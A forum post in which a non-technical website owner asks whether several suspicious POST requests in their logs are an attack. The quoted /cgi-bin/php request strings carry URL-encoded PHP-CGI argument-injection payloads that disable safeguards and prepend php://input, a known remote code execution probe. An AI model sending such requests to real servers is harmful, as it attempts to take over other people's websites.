I will preface this question by saying I am NOT a web developer, nor do I have much knowledge in this field. I am a business owner and have a low volume website that my customers purchase products on. I've noticed this set of queries a few minutes ago and they appear very suspicious to me, a layperson. It looks as if they are trying to pull data from my database? I could be totally wrong, but someone please let me know what they think is going on here.
Notes:
- All are listed with method of POST when most normal viewers are listed as GET.
- everything below occurs immediately after my domain name e.g. examplesite.com/xxxxxxxx
Here are the queries:
/cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D""+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n
/cgi-bin/php5?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D""+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n
/cgi-bin/php4?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D""+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n
And about 6 more similar queries.
Notes: when I follow that link, my site gives an error of page not found. When I try to go to site.com/cgi-bin/ I get a stock 403 forbidden error from my host.
Thoughts please? Am I being paranoid here?
Edit: Also, in my file manager, my cgi-bin folder is empty: 'this directory is empty'.